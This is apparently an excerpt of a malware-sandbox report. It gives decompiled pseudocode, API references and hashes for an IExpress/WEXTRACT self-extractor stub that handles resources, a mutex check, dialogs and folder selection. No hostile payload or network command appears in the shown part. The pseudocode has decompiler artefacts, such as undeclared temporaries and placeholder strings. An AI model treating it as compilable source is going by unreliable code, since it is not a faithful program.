                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x3991e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x3991e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0x3991e4 - 0x5c;
                                                                                                                                                                                                    						if( *0x3991e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0x399124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0x399a3c, 0x3e8, 0x398598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00394224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3987a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E003944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x003932f6
                                                                                                                                                                                                    0x003933d4
                                                                                                                                                                                                    0x003933d6
                                                                                                                                                                                                    0x003933db
                                                                                                                                                                                                    0x003933dc
                                                                                                                                                                                                    0x003933de
                                                                                                                                                                                                    0x003933df
                                                                                                                                                                                                    0x00393370
                                                                                                                                                                                                    0x00393372
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393372
                                                                                                                                                                                                    0x003932fc
                                                                                                                                                                                                    0x00393301
                                                                                                                                                                                                    0x00393301
                                                                                                                                                                                                    0x00393303
                                                                                                                                                                                                    0x00393304
                                                                                                                                                                                                    0x00393304
                                                                                                                                                                                                    0x0039330a
                                                                                                                                                                                                    0x0039330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393313
                                                                                                                                                                                                    0x00393318
                                                                                                                                                                                                    0x0039331a
                                                                                                                                                                                                    0x00393331
                                                                                                                                                                                                    0x00393332
                                                                                                                                                                                                    0x0039333a
                                                                                                                                                                                                    0x0039333d
                                                                                                                                                                                                    0x0039337c
                                                                                                                                                                                                    0x00393388
                                                                                                                                                                                                    0x0039338f
                                                                                                                                                                                                    0x00393394
                                                                                                                                                                                                    0x00393396
                                                                                                                                                                                                    0x003933a4
                                                                                                                                                                                                    0x003933ab
                                                                                                                                                                                                    0x003933b6
                                                                                                                                                                                                    0x003933be
                                                                                                                                                                                                    0x003933c3
                                                                                                                                                                                                    0x003933c5
                                                                                                                                                                                                    0x00393435
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x003933c7
                                                                                                                                                                                                    0x003933c9
                                                                                                                                                                                                    0x003933cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003933cc
                                                                                                                                                                                                    0x003933ad
                                                                                                                                                                                                    0x003933b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003933b4
                                                                                                                                                                                                    0x00393398
                                                                                                                                                                                                    0x00393399
                                                                                                                                                                                                    0x0039339b
                                                                                                                                                                                                    0x0039339c
                                                                                                                                                                                                    0x0039339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039339d
                                                                                                                                                                                                    0x0039334c
                                                                                                                                                                                                    0x00393351
                                                                                                                                                                                                    0x00393354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039335c
                                                                                                                                                                                                    0x00393362
                                                                                                                                                                                                    0x00393364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393366
                                                                                                                                                                                                    0x00393367
                                                                                                                                                                                                    0x00393369
                                                                                                                                                                                                    0x0039336a
                                                                                                                                                                                                    0x0039336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039336b
                                                                                                                                                                                                    0x0039331c
                                                                                                                                                                                                    0x00393323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393329
                                                                                                                                                                                                    0x0039332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039332b
                                                                                                                                                                                                    0x0039324c
                                                                                                                                                                                                    0x0039324c
                                                                                                                                                                                                    0x0039324f
                                                                                                                                                                                                    0x003932c8
                                                                                                                                                                                                    0x003932ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932ce
                                                                                                                                                                                                    0x00393251
                                                                                                                                                                                                    0x00393256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393271
                                                                                                                                                                                                    0x00393277
                                                                                                                                                                                                    0x00393279
                                                                                                                                                                                                    0x00393298
                                                                                                                                                                                                    0x0039329d
                                                                                                                                                                                                    0x0039329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932b0
                                                                                                                                                                                                    0x003932b6
                                                                                                                                                                                                    0x003932b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932be
                                                                                                                                                                                                    0x00393280
                                                                                                                                                                                                    0x00393289
                                                                                                                                                                                                    0x0039328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039328e
                                                                                                                                                                                                    0x0039327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039327b
                                                                                                                                                                                                    0x00000000

APIs
• LoadStringA.USER32(000003E8,00398598,00000200), ref: 00393271
• GetDesktopWindow.USER32 ref: 003933E2
• SetWindowTextA.USER32(?,nst0dum), ref: 003933F7
• SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00393410
• GetDlgItem.USER32(?,00000836), ref: 00393426
• EnableWindow.USER32(00000000), ref: 0039342D
• EndDialog.USER32(?,00000000), ref: 0039343F
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$nst0dum
• API String ID: 2418873061-1739013265
• Opcode ID: 854b2044782dc40b2e7f013c956ff05bc14f346d5e63ccf2d6da02c48f701d1a
• Instruction ID: 1f17abcccf3b9c81acc2d56d253fa03dc44cf75e536440237567c405e2f947e3
• Opcode Fuzzy Hash: 854b2044782dc40b2e7f013c956ff05bc14f346d5e63ccf2d6da02c48f701d1a
• Instruction Fuzzy Hash: 4D517DB03802417BEF231B3A5C8CF7F2A5CEB46B44F51412AF246D61D0CAA58E02D3A2
Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 93%
// Entry routine of the self-extractor stub. It pulls its settings from named
// RT_RCDATA resources (TITLE, EXTRACTOPT, INSTANCECHECK, VERCHECK); this resource
// layout and the IXP001.TMP working directory seen in the String ID above are the
// markers of an IExpress/WEXTRACT package. Decompiler temporaries (_t34, _t57, _t64)
// are left as emitted; E003944B9 appears to be a message-box wrapper whose return
// value is the MessageBox result.
E00392CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
	signed int _v8;              // local copy of the stack cookie
	char _v268;                  // 0x104-byte buffer for the INSTANCECHECK mutex name
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t13;
	void* _t20;
	void* _t23;                  // return value: 1 = continue, 0 = abort
	void* _t27;
	struct HRSRC__* _t31;
	intOrPtr _t33;
	void* _t43;
	void* _t48;
	signed int _t65;
	struct HINSTANCE__* _t66;
	signed int _t67;

	_t13 =  *0x398004; // 0x74c05eb4 (security cookie, XORed with EBP)
	_v8 = _t13 ^ _t67;
	_t65 = 0;
	_t66 = __ecx;                // module handle, also stored in a global
	_t48 = __edx;
	 *0x399a3c = __ecx;
	memset(0x399140, 0, 0x8fc);  // zero the global state blocks
	memset(0x398a20, 0, 0x32c);
	memset(0x3988c0, 0, 0x104);
	 *0x3993ec = 1;
	// TITLE resource -> caption buffer; missing or longer than 0x80 bytes is fatal
	_t20 = E0039468F("TITLE", 0x399154, 0x7f);
	if(_t20 == 0 || _t20 > 0x80) {
		_t64 = 0x4b1;            // string id of the error text
		goto L32;
	} else {
		_t27 = CreateEventA(0, 1, 1, 0);   // manual-reset event, created signaled
		 *0x39858c = _t27;
		SetEvent(_t27);
		_t64 = 0x399a34;
		// EXTRACTOPT: 4-byte flag word; bits 0xC0 enable the single-instance check
		if(E0039468F("EXTRACTOPT", 0x399a34, 4) != 0) {
			if(( *0x399a34 & 0x000000c0) == 0) {
				L12:
				 *0x399120 =  *0x399120 & _t65;
				if(E00395C9E(_t48, _t48, _t65, _t66) != 0) {
					if( *0x398a3a == 0) {
						// 0xa = RT_RCDATA; VERCHECK is optional
						_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
						if(_t31 != 0) {
							_t65 = LoadResource(_t66, _t31);
						}
						if( *0x398184 != 0) {
							__imp__#17();    // import by ordinal #17; DLL not resolved in this listing
						}
						if( *0x398a24 == 0) {
							_t57 = _t65;
							if(E003936EE(_t65) == 0) {
								goto L33;
							} else {
								_t33 =  *0x399a40; // 0x3
								_t48 = 1;
								if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
									// EXTRACTOPT bit 0x100 gates one more check before extraction continues
									if(( *0x399a34 & 0x00000100) == 0 || ( *0x398a38 & 0x00000001) != 0 || E003918A3(_t64, _t66) != 0) {
										goto L30;
									} else {
										_t64 = 0x7d6;
										if(E00396517(_t57, 0x7d6, _t34, E003919E0, 0x547, 0x83e) != 0x83d) {
											goto L33;
										} else {
											goto L30;
										}
									}
								} else {
									L30:
									_t23 = _t48;
								}
							}
						} else {
							_t23 = 1;
						}
					} else {
						E00392390(0x398a3a);
						goto L33;
					}
				} else {
					_t64 = 0x520;
					L32:
					E003944B9(0, _t64, 0, 0, 0x10, 0);   // 0x10 = MB_ICONERROR
					goto L33;
				}
			} else {
				// INSTANCECHECK resource holds the mutex name used for the single-instance test
				_t64 =  &_v268;
				if(E0039468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
					goto L3;
				} else {
					_t43 = CreateMutexA(0, 1,  &_v268);
					 *0x398588 = _t43;
					// 0xb7 = ERROR_ALREADY_EXISTS: another instance owns the mutex
					if(_t43 == 0 || GetLastError() != 0xb7) {
						goto L12;
					} else {
						if(( *0x399a34 & 0x00000080) == 0) {
							// bit 0x80 clear: ask the user (0x20|4 = MB_ICONQUESTION|MB_YESNO); 6 = IDYES
							_t64 = 0x524;
							if(E003944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
								goto L12;
							} else {
								goto L11;
							}
						} else {
							// bit 0x80 set: show the error and abort
							_t64 = 0x54b;
							E003944B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
							L11:
							CloseHandle( *0x398588);
							 *0x399124 = 0x800700b7;   // HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS)
							goto L33;
						}
					}
				}
			}
		} else {
			L3:
			_t64 = 0x4b1;
			E003944B9(0, 0x4b1, 0, 0, 0x10, 0);
			 *0x399124 = 0x80070714;   // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND)
			L33:
			_t23 = 0;
		}
	}
	return E00396CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);   // epilogue with cookie check
}



















                                                                                                                                                                                                    Control Flow Graph (basic-block address column only; graph rendering not extracted): blocks from 0x00392cb5 to 0x00392f18

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CD9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CE9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00392CF9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00392D34
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00392D40
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00392DAE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00392DBD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00392E0A
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
                                                                                                                                                                                                    • API String ID: 1002816675-1021407552
                                                                                                                                                                                                    • Opcode ID: a6456179bc8952338352f38fbbee79c960b6ae17a8d8c817bbc6eed0141cd3fe
                                                                                                                                                                                                    • Instruction ID: ed91c9c976bbb5cd1facf0d8c3eb8cd4cdebe3af2b62ec9312881cc00dc1547e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6456179bc8952338352f38fbbee79c960b6ae17a8d8c817bbc6eed0141cd3fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA51E870740B017BEF276B399C8AB7B369CEB86700F01442BF942D96E5DBB58C41C665
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 81%
E003934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x3991d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0x398584 = _t35;
		E003943D0(_t35, GetDesktopWindow());
		__eflags =  *0x398184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "nst0dum");
		_t17 = CreateThread(0, 0, E00394FE0, 0, 0, 0x398798);
		 *0x39879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E003944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
			_push(0);
			_push(_t35);
			goto L21;
		}
	}
	_t23 = _t13 - 1;
	if(_t23 == 0) {
		__eflags = _a12 - 2;
		if(_a12 != 2) {
			goto L22;
		}
		ResetEvent( *0x39858c);
		_t38 =  *0x398584; // 0x0
		_t25 = E003944B9(_t38, 0x4b2, 0x391140, 0, 0x20, 4);
		__eflags = _t25 - 6;
		if(_t25 == 6) {
			L11:
			 *0x3991d8 = 1;
			SetEvent( *0x39858c);
			_t39 =  *0x39879c; // 0x0
			E00393680(_t39);
			_push(0);
			goto L20;
		}
		__eflags = _t25 - 1;
		if(_t25 == 1) {
			goto L11;
		}
		SetEvent( *0x39858c);
		goto L22;
	}
	if(_t23 == 0xe90) {
		TerminateThread( *0x39879c, 0);
		EndDialog(_a4, _a12);
		return 1;
	}
	return 0;
}

APIs
• TerminateThread.KERNEL32(00000000), ref: 00393535
• EndDialog.USER32(?,?), ref: 00393541
• ResetEvent.KERNEL32 ref: 0039355F
• SetEvent.KERNEL32(00391140,00000000,00000020,00000004), ref: 00393590
• GetDesktopWindow.USER32 ref: 003935C7
• GetDlgItem.USER32(?,0000083B), ref: 003935F1
• SendMessageA.USER32(00000000), ref: 003935F8
• GetDlgItem.USER32(?,0000083B), ref: 00393610
• SendMessageA.USER32(00000000), ref: 00393617
• SetWindowTextA.USER32(?,nst0dum), ref: 00393623
• CreateThread.KERNEL32 ref: 00393637
• EndDialog.USER32(?,00000000), ref: 00393671
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
• String ID: nst0dum
• API String ID: 2406144884-432003757
• Opcode ID: 4238add8d151f58768d9ca084cb7edfe92f87a669e27f29d5bcbaac41ccee22b
• Instruction ID: 57cfbe3f1d9c0f5472eca5aa770b07abc3c39f682aac781a43f0a54c16edc3a0
• Opcode Fuzzy Hash: 4238add8d151f58768d9ca084cb7edfe92f87a669e27f29d5bcbaac41ccee22b
• Instruction Fuzzy Hash: 2631C9B1240301BBDF231F29EC4DE2B3A6DE7C6B01F11491BF642952B0CA738901DB95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
E00394224(char __ecx) {
	char* _v8;
	_Unknown_base(*)()* _v12;
	_Unknown_base(*)()* _v16;
	_Unknown_base(*)()* _v20;
	char* _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	intOrPtr _v40;
	char _v44;
	char _v48;
	char _v52;
	_Unknown_base(*)()* _t26;
	_Unknown_base(*)()* _t28;
	_Unknown_base(*)()* _t29;
	_Unknown_base(*)()* _t32;
	char _t42;
	char* _t44;
	char* _t61;
	void* _t63;
	char* _t65;
	struct HINSTANCE__* _t66;
	char _t67;
	void* _t71;
	char _t76;
	intOrPtr _t85;

	_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E003944B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x3988c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x3987a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x398598;
		_v36 = 1;
		_v32 = E00394200;
		_v28 = 0x3988c0;
		 *0x39a288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x39a288(_t32, 0x3988c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x3988c0 != 0) {
				E00391680(0x3987a0, 0x104, 0x3988c0);
			}
			 *0x39a288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x3987a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x3988c0);
		_t61 = 0x3988c0;
		_t4 =  &(_t61[1]); // 0x3988c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x3988c0; // 0x731181
		_t44 = CharPrevA(0x3988c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x3988c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00394236
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0039424C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00394263
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0039427A
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,003988C0,?,00000001), ref: 0039429F
                                                                                                                                                                                                    • CharPrevA.USER32(003988C0,00731181,?,00000001), ref: 003942C2
                                                                                                                                                                                                    • CharPrevA.USER32(003988C0,00000000,?,00000001), ref: 003942D6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00394391
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003943A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                    • Opcode ID: 7a9c565a7551854982f2195b17f2b3cd5473b55c282b178b90112e11dcb90451
                                                                                                                                                                                                    • Instruction ID: 046c9046874f78f07349c984d60fd685e8f4f7ac51799cba27caa12cfa3af9d7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9c565a7551854982f2195b17f2b3cd5473b55c282b178b90112e11dcb90451
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30410B78A04204AFEF139F74DC84DAE7BB8EB86344F55056AE941A7351CB768C02C7A1
                                                                                                                                                                                                    Uniqueness
                                                                                                                                                                                                    • Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00392773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
				_t23 =  *0x398004; // 0x74c05eb4
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00391781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0039658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0039658A(_t61, _t63, _v276);
							} else {
